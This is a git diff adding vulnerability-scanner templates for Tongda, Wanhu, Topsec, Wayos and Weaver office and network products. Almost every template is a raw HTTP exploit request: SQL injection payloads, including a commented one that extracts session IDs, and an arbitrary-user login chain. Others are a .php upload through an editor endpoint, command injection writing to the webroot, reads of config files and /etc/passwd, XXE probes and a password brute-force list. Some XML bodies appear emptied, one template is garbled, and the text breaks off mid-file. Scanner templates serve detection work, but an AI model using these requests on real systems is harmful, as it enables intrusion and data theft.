b/http/vulnerabilities/tongda/tongda-oa-insert-sqli.yaml @@ -0,0 +1,33 @@ +id: tongda-oa-insert-sqli + +info: + name: tongda-oa-insert-sqli + author: SleepingBag945 + severity: high + description: 通达OA v11.6 insert参数包含SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20insert%20SQL注入漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + POST /general/document/index.php/recv/register/insert HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= + + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "PHPSESSID=" + - type: status + status: + - 302 + + +#exp title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER= \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml b/http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml new file mode 100755 index 0000000000..01993880a8 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-login-code-arbitrary-login.yaml @@ -0,0 +1,52 @@ +id: tongda-oa-login-code-arbitrary-login +info: + name: tongda-oa-login-code-arbitrary-login + author: SleepingBag945 + severity: high + description: 通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录.登录之后可进一步上传恶意文件控制网站服务器。 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20login_code.php%20任意用户登录.html + tags: tongda,oa + +http: + - raw: + - | + GET /general/login_code.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /logincheck_code.php HTTP/1.1 + Host: {{Hostname}} + + CODEUID={{uid}}&UID=1 + + - | + GET /general/index.php?isIE=0&modify_pwd=0 HTTP/1.1 + Host: {{Hostname}} + Cookie: PHPSESSID={{cookie}}; + + + extractors: + - type: regex + name: uid + internal: true + group: 1 + regex: + - '"code_uid":"(.*?)"' + - type: regex + name: cookie + internal: true + part: header + group: 1 + regex: + - 'PHPSESSID=(.*?);' + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1, "\"code_uid\":\"{") && contains(body_1,"\"status\":1")' + - 'status_code_2 == 200 && contains(body_2,"index.php?isIE")' + - 'status_code_2 == 200 && contains(header_2,"Set-Cookie")' + - 'status_code_3 == 200 && !contains(body_3,"用户未登录") && contains(body_3,"loginUser")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml new file mode 100755 index 0000000000..a7a02665d9 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-meeting-unauth.yaml @@ -0,0 +1,37 @@ +id: tongda-oa-meeting-unauth + +info: + name: tongda-oa-meeting-unauth + author: SleepingBag945 + severity: medium + description: 通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html + tags: tongda,oa + +http: + - raw: + - | + GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 + Accept: */* + Accept-Encoding: deflate + + + + matchers-condition: and + matchers: + - type: word + words: + - "creator" + - type: word + words: + - "originalTitle" + - type: word + part: header + words: + - "application/json" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml new file mode 100755 index 0000000000..e390f5f1b0 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-report-bi-func-sqli.yaml @@ -0,0 +1,28 @@ +id: tongda-oa-report-bi-func-sqli + +info: + name: tongda-oa-report-bi-func-sqli + author: SleepingBag945 + severity: high + description: 通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.6%20report_bi.func.php%20SQL注入漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + POST /general/bi_design/appcenter/report_bi.func.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info& + + + matchers-condition: and + matchers: + - type: word + words: + - "root@" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml b/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml new file mode 100755 index 0000000000..8926dc29c1 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml @@ -0,0 +1,50 @@ +id: tongda-oa-swfupload-sqli + +info: + name: tongda-oa-swfupload-sqli + author: SleepingBag945 + severity: high + description: 通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器敏感信息 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + POST /general/file_folder/swfupload_new.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2 + Accept-Encoding: gzip + + ------------GFioQpMK0vv2 + Content-Disposition: form-data; name="ATTACHMENT_ID" + + 1 + ------------GFioQpMK0vv2 + Content-Disposition: form-data; name="ATTACHMENT_NAME" + + 1 + ------------GFioQpMK0vv2 + Content-Disposition: form-data; name="FILE_SORT" + + 2 + ------------GFioQpMK0vv2 + Content-Disposition: form-data; name="SORT_ID" + + ------------GFioQpMK0vv2-- + + + matchers-condition: and + matchers: + - type: word + words: + - "不安全的SQL语句" + - type: status + status: + - 200 + + + +#Content-Disposition: form-data; name="SORT_ID" +#0 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)) diff --git a/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml b/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml new file mode 100755 index 0000000000..c005e9829d --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-v2014-get-contactlist-info-leak.yaml @@ -0,0 +1,35 @@ +id: tongda-oa-v2014-get-contactlist-info-leak + +info: + name: tongda-oa-v2014-get-contactlist-info-leak + author: SleepingBag945 + severity: medium + description: 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + words: + - "user_uid" + - type: word + words: + - "user_name" + - type: word + words: + - "user_id" + - type: word + words: + - "priv_name" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..b963b3a783 --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-v2017-action-upload-arbitrary-file-upload.yaml @@ -0,0 +1,61 @@ +id: tongda-oa-v2017-action-upload-arbitrary-file-upload + +info: + name: tongda-oa-v2017-action-upload-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp + X_requested_with: XMLHttpRequest + Accept-Encoding: gzip + + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="CONFIG[fileFieldName]" + + ffff + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="CONFIG[fileMaxSize]" + + 1000000000 + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="CONFIG[filePathFormat]" + + {{randstr_1}} + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]" + + .php + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="ffff"; filename="test.php" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryjhddzlqp + Content-Disposition: form-data; name="mufile" + + submit + ------WebKitFormBoundaryjhddzlqp-- + + - raw: + - | + GET {{randstr_1}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "1f18933ca1e531c1eac9cccc4952a03b" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml b/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml new file mode 100755 index 0000000000..32b896e79e --- /dev/null +++ b/http/vulnerabilities/tongda/tongda-oa-v2017-video-file-arbitrary-file-read.yaml @@ -0,0 +1,29 @@ +id: tongda-oa-v2017-video-file-arbitrary-file-read + +info: + name: tongda-oa-v2017-video-file-arbitrary-file-read + author: SleepingBag945 + severity: medium + description: 通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件 + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + tags: tongda,oa,info + +http: + - raw: + - | + GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + words: + - "$ROOT_PATH" + - type: word + words: + - "$ATTACH_PATH" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/topsec/topsec-topacm-rce.yaml b/http/vulnerabilities/topsec/topsec-topacm-rce.yaml new file mode 100755 index 0000000000..1de5d07dfc --- /dev/null +++ b/http/vulnerabilities/topsec/topsec-topacm-rce.yaml @@ -0,0 +1,36 @@ +id: topsec-topacm-rce + +info: + name: topsec topacm remote code execution + author: SleepingBag945 + severity: critical + description: 天融信 上网行为管理系统 static_convert.php 远程命令执行漏洞 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/TRXController.java + - https://github.com/Phuong39/2022-HW-POC/blob/main/天融信-上网行为管理系统RCE.md + tags: rce,topsec,topacm + +http: + - raw: + - | + GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - raw: + - | + GET /config_application.txt HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "{{randstr}}" + + - type: status + status: + - 200 + + +# body="ActiveXObject" && body="dkey_login" && body="repeat-x left top" \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml new file mode 100755 index 0000000000..77604a295a --- /dev/null +++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml @@ -0,0 +1,33 @@ +id: topsec-topapplb-arbitrary-user-login + +info: + name: Topsec TopAppLB Any account Login + author: SleepingBag945 + severity: critical + description: | + Any Account can log in to the background + tags: defaultaccount + +http: + - raw: + - | + POST /login_check.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Sec-Fetch-Site: same-origin + Sec-Fetch-Mode: navigate + Sec-Fetch-User: ?1 + Sec-Fetch-Dest: document + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + userName=admin&password=%3Bid + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && contains(header_1,"redirect.php")' + condition: and diff --git a/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml new file mode 100755 index 0000000000..25399c455c --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-oa-documentedit-sqli.yaml @@ -0,0 +1,30 @@ +id: wanhu-oa-documentedit-sqli + +info: + name: wanhu-oa-documentedit-sqli + author: SleepingBag945 + severity: high + description: 万户Ezoffice系统是一套基于jsp的oa系统,该系统基于J2EE架构技术的三层架构,完全采用B/S体系结构,广泛应用于各个行业。 万户ezOFFICE协同办公系统DocumentEdit.jsp存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。 + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20DocumentEdit.jsp%20SQL注入漏洞.html + tags: wanhu,oa,sqli + +http: + - raw: + - | + GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27caqopg%27||%27povurh%27,null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - "HTTP-EQUIV=\"Pragma\"" + - type: word + words: + - "caqopgpovurh" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml b/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml new file mode 100755 index 0000000000..493655e857 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-oa-download-ftp-arbitrary-file-read.yaml @@ -0,0 +1,29 @@ +id: wanhu-oa-download-ftp-arbitrary-file-read +info: + name: wanhu-oa-download-ftp-arbitrary-file-read + author: SleepingBag945 + severity: high + description: 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20download_ftp.jsp%20任意文件下载漏洞.html + tags: wanhu,oa + +http: + - raw: + - | + GET /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - " + --b0d829daa06c13d6b3e16b0ad21d1eed-- + + - | + GET /defaultroot/upload/html/{{filename}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip + + + extractors: + - type: regex + name: filename + internal: true + group: 1 + regex: + - '"data":"(.*?)"' + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")' + - 'status_code_2 == 200 && contains(body_2,"1757322315")' + condition: and diff --git a/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..9dcaff9f6b --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-oa-officeserverservlet-arbitrary-file-upload.yaml @@ -0,0 +1,27 @@ +id: wanhu-oa-officeserverservlet-arbitrary-file-upload +info: + name: wanhu-oa-officeserverservlet-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 万户OA officeserverservlet 文件上传漏洞 + reference: + - https://github.com/onMey/WH/blob/main/poc.py + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20OfficeServer.jsp%20任意文件上传漏洞.html + tags: wanhu,oa + +http: + - raw: + - | + GET /defaultroot/officeserverservlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - "DBSTEP V3.0" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml b/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..c2f4558c06 --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-oa-smartupload-arbitrary-file-upload.yaml @@ -0,0 +1,29 @@ +id: wanhu-oa-smartupload-arbitrary-file-upload +info: + name: wanhu-oa-smartupload-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 万户OA smartUpload.jsp文件存在文件上传接口,且没有对文件类型进行过滤,导致任意文件上传漏洞。可直接上传恶意JSP文件。 + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20smartUpload.jsp%20任意文件上传漏洞.html + tags: wanhu,oa + +http: + - raw: + - | + GET /defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - "请选择要上传的文件" + - type: word + words: + - "上传附件" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml new file mode 100755 index 0000000000..08d101247c --- /dev/null +++ b/http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml @@ -0,0 +1,28 @@ +id: wanhu-oa-teleconferenceservice-xxe-inject +info: + name: wanhu-oa-teleconferenceservice-xxe-inject + author: SleepingBag945 + severity: medium + description: 万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息 + reference: + - http://wiki.peiqi.tech/wiki/oa/万户OA/万户OA%20TeleConferenceService%20XXE注入漏洞.html + tags: wanhu,oa,xxe + +http: + - raw: + - | + POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService HTTP/1.1 + Host: {{Hostname}} + + + ]> + &xxe; + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" diff --git a/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml b/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml new file mode 100755 index 0000000000..cc49314398 --- /dev/null +++ b/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml @@ -0,0 +1,47 @@ +id: wayos-ac-weak-login + +info: + name: wayos-ac weak password + author: SleepingBag945 + severity: high + description: wayos weak login credentials were discovered. + reference: + - https://github.com/Ershu1/2021_Hvv/blob/main/ + tags: ways-ac + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user=admin&password={{ password }}&Submit=%E7%99%BB%E5%BD%95 + + attack: pitchfork + payloads: + password: + - admin + - 123456 + - 12345678 + - password + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "ac_userid=admin,ac_passwd" + condition: and + + - type: word + part: body + words: + - "window.open" + - "text/javascript" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/CNVD-2023-12632.yaml b/http/vulnerabilities/weaver/CNVD-2023-12632.yaml new file mode 100755 index 0000000000..f73fff1168 --- /dev/null +++ b/http/vulnerabilities/weaver/CNVD-2023-12632.yaml @@ -0,0 +1,41 @@ +id: CNVD-2023-12632 + +info: + name: E-Cology V9 - SQL Injection + author: daffainfo + severity: high + description: | + Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information. + reference: + - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003 + - https://blog.csdn.net/qq_50854662/article/details/129992329 + metadata: + max-request: 1 + verified: "true" + fofa-query: app="泛微-协同商务系统" + shodan-query: 'ecology_JSessionid' + tags: cnvd,cnvd2023,ecology,sqli + +# a' union select 1,''+(SELECT md5(9999999))+' +# URL encoded 3 times + +http: + - raw: + - | + GET /mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'browserUrl' + - '"autoCount"' + - '"autoGet"' + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml b/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml new file mode 100755 index 0000000000..869ef2f3e3 --- /dev/null +++ b/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml @@ -0,0 +1,24 @@ +id: ecology-oa-byxml-xxe + +info: + name: EcologyOA deleteUserRequestInfoByXml - XXE + author: unknown + severity: high + description: EcologyOA deleteUserRequestInfoByXml interface has XXE + tags: ecology-oa,xxe + +http: + - raw: + - | + POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + Accept-Encoding: gzip + + + + matchers: + - type: word + words: + - 'WfData' + diff --git a/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml b/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml new file mode 100755 index 0000000000..ccb8db79ea --- /dev/null +++ b/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml @@ -0,0 +1,25 @@ +id: ecology-oa-filedownloadforoutdoc-sqli + +info: + name: EcologyOA filedownloadforoutdoc - SQL injection + author: unknown + severity: critical + description: EcologyOA filedownloadforoutdoc interface has SQL injection + tags: ecology-oa,sqli + +http: + - raw: + - | + POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + fileid=2+WAITFOR DELAY+'0:0:7'&isFromOutImg=1 + matchers: + - type: dsl + dsl: + - 'duration>=7' + diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml new file mode 100644 index 0000000000..7f29310417 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml @@ -0,0 +1,45 @@ +id: weaver-e-bridge-linux-saveyzjfile-file-read + +info: + name: weaver-e-bridge-linux-saveyzjfile-file-read + author: SleepingBag945 + severity: high + description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 + reference: + - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + tags: eBridge,weaver,oa,read + +http: + - raw: + - | + GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + GET /file/fileNoLogin/{{idname}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: idname + internal: true + group: 1 + regex: + - '"id":"(.*?)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,'id') + - "status_code_2 == 200 && contains(body_2, 'root:x:0')" + condition: and + + diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml new file mode 100644 index 0000000000..505e9fa07e --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml @@ -0,0 +1,45 @@ +id: weaver-e-bridge-windows-saveyzjfile-file-read + +info: + name: weaver-e-bridge-windows-saveyzjfile-file-read + author: SleepingBag945 + severity: high + description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 + reference: + - 